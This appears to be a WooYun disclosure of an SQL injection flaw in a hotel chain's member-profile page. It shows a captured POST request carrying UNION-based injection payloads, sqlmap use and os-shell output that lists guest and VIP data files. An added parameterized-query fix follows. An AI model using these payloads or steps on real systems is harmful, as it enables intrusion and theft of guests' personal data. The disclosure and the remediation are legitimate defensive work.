Vulnerability summary

Defect ID: wooyun-2013-038106

Title: Jiayi Hotels has an SQL injection vulnerability that allows viewing room booking records and executing system commands

Related vendor: jyhotels.com

Author: yofx

Submitted: 2013-09-25 14:56

Fix time: 2013-09-30 14:57

Disclosed: 2013-09-30 14:57

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 20

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2013-09-25: Details reported to the vendor, awaiting the vendor's handling
2013-09-30: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

First report, more to follow. Hey folks, have you and your girlfriend checked into a hotel room yet?

Detailed description:

The vulnerability is fairly well hidden: it sits in the member information page that is only reachable after logging in. To reproduce it, register an account, log in, and open the following page (the hostname is redacted as [马赛克] throughout this report):

http://[马赛克].com/hy_hyxx.asp


Change any one of the fields there, for example the telephone number, and capture the request; it looks like this:
Request headers:

POST /interface/GetCardInfoto.asp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://[马赛克].com/hy_hyxx.asp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; qdesk 2.5.1277.202; Windows NT 6.1; WOW64; Trident/6.0; EIE10;ZHCNMSE)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 226
DNT: 1
Host: [马赛克].com
Pragma: no-cache
Cookie: ASPSESSIONIDQQARACTT=IMIFFNABNOMDGJOPCLMCIKHN; __utma=151624807.147161778.1380073670.1380073670.1380073670.1; __utmb=151624807.1.10.1380073670; __utmc=151624807; __utmz=151624807.1380073670.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CNZZDATA2483714=cnzz_eid%3D1610132666-1380073670-http%253A%252F%252F[马赛克].com%26ntime%3D1380073670%26cnzz_a%3D0%26retime%3D1380073671094%26sin%3D%26ltime%3D1380073671094%26rtime%3D0; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; Hm_lvt_5bc7cb98a65977d60bcfcef84a320f0f=1380073671; Hm_lpvt_5bc7cb98a65977d60bcfcef84a320f0f=1380073671


POST body:

Password=我是马赛克&no=我是马赛克&sex=%C4%D0&mobile=我是马赛克&phone=1234%2527and+1%3D1&emaile=1fsdf@qq.com&street=-5057+UNION+ALL+SELECT+CONCAT%280x7177766271%2C0x637a4b7169577a787748%2C0x71786a6b71%29%23&zip=&button2=%D0%DE%B8%C4


Er, my own test statements are in that body, don't mind them... heh.
Next, feed it to sqlmap; just set the POST data and the cookie.
The vulnerable page is

/interface/GetCardInfoto.asp

where the submitted parameters are not filtered, leading to injection and a full database dump.
I had a quick look at the loyalty-points system... points can be redeemed for goods... this... please fix it quickly. I did not change anything.

Proof of vulnerability:

1.png


Injection is indeed possible, and the database account is a DBA.

2.png


cmd commands can be executed, though not with SYSTEM privileges.

3.png


command standard output:
---
驱动器 C 中的卷没有标签。
卷的序列号是 B8BB-9F62

c:\data 的目录

2012/03/17 12:24 <DIR> .
2012/03/17 12:24 <DIR> ..
2012/03/17 11:23 28,784,339 guest_card.out
2012/03/17 11:49 194,312,036 guest_income.out
2012/03/17 11:25 145,380,327 hmaster.out
2012/03/17 11:25 1,383,091 master.out
2012/03/17 11:27 133,089,417 master_detail_crs.out
2012/03/17 11:27 13,083,788 master_hotel.out
2012/03/17 11:27 458,880 master_hung.out
2012/03/17 11:31 275,499,065 master_log.out
2012/03/17 11:43 2,576,718 operatelog.out
2012/03/17 11:31 2,388,728 rmamount.out
2012/03/17 11:31 19,097,772 sms_send.out
2012/03/17 11:50 107,318,465 vipcard.out
2012/03/17 11:37 263,730,610 vippoint.out
2012/03/17 11:33 112,167,003 vip_xf.out
2012/03/17 11:37 8,333,601 ycus_xf_crs.out
2012/03/17 11:43 308,959,445 yjourrep_crs.out
2012/03/17 11:45 111,480,400 yjourrep_crs_inzone.out
2012/03/17 11:43 6,890,456 ymktsummaryrep_crs.out
18 个文件 1,734,934,141 字节
2 个目录 55,046,377,472 可用字节
---
os-shell>


Database:

Database: InZoneCRS
[309 tables]


Fix recommendation:

Even POST parameters should be filtered, sigh...
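A hardened version of the profile-update handler, added here as an illustration and not code from jyhotels.com or the original report: the same POST fields sent to `/interface/GetCardInfoto.asp` are bound as ADODB parameters instead of being concatenated into the SQL text, so values like the `phone` and `street` payloads captured above are stored as literal strings rather than changing the query. The page is classic ASP (VBScript), so the example uses it; the table `hy_member`, its column names, `Application("ConnString")` and `Session("card_no")` are assumed names, and `adVarWChar` is used because the form carries Chinese text.

```vbscript
<%@ Language="VBScript" %>
<% Option Explicit
' Added example, not the vendor's code. Table hy_member, its columns,
' Application("ConnString") and Session("card_no") are assumed names.

' --- Vulnerable pattern implied by the report: POST fields spliced into the SQL text ---
' sql = "UPDATE hy_member SET phone='" & Request.Form("phone") & "'," & _
'       " street='" & Request.Form("street") & "' WHERE card_no='" & Request.Form("no") & "'"
' conn.Execute sql   ' a value such as  1234'and 1=1  or  -5057 UNION ALL SELECT ...  rewrites the query

' --- Hardened pattern: ADODB.Command with bound parameters ---
Const adCmdText = 1, adParamInput = 1, adVarWChar = 202

Function UpdateMemberContact(conn, cardNo, phone, mobile, street, zip)
    Dim cmd, affected
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    ' The SQL text never contains user input; each '?' is filled by the driver at execution.
    cmd.CommandText = "UPDATE hy_member SET phone = ?, mobile = ?, street = ?, zip = ? " & _
                      "WHERE card_no = ?"
    ' CreateParameter(Name, Type, Direction, Size, Value); Size is the declared width,
    ' kept equal to the column width so the database sees a typed string, not SQL.
    cmd.Parameters.Append cmd.CreateParameter("phone",   adVarWChar, adParamInput, 20,  phone)
    cmd.Parameters.Append cmd.CreateParameter("mobile",  adVarWChar, adParamInput, 20,  mobile)
    cmd.Parameters.Append cmd.CreateParameter("street",  adVarWChar, adParamInput, 200, street)
    cmd.Parameters.Append cmd.CreateParameter("zip",     adVarWChar, adParamInput, 10,  zip)
    cmd.Parameters.Append cmd.CreateParameter("card_no", adVarWChar, adParamInput, 32,  cardNo)
    cmd.Execute affected
    UpdateMemberContact = affected   ' number of rows updated (0 or 1)
End Function

Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnString")
' The row to update is taken from the logged-in session, not from the POSTed "no" field.
Call UpdateMemberContact(conn, Session("card_no"), Request.Form("phone"), _
    Request.Form("mobile"), Request.Form("street"), Request.Form("zip"))
conn.Close
%>
```

Separately from the query fix, the database login the site connects with should not hold DBA rights: the report shows that OS command execution was reached through that account, which parameterization alone does not address.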

Copyright notice: when reposting, please credit the source: yofx@WooYun


Vulnerability response

Vendor response:

Severity: No impact (vendor ignored)

Ignored at: 2013-09-30 14:57

Vendor reply:

Vulnerability rank: 9 (WooYun rating)

Latest status:

None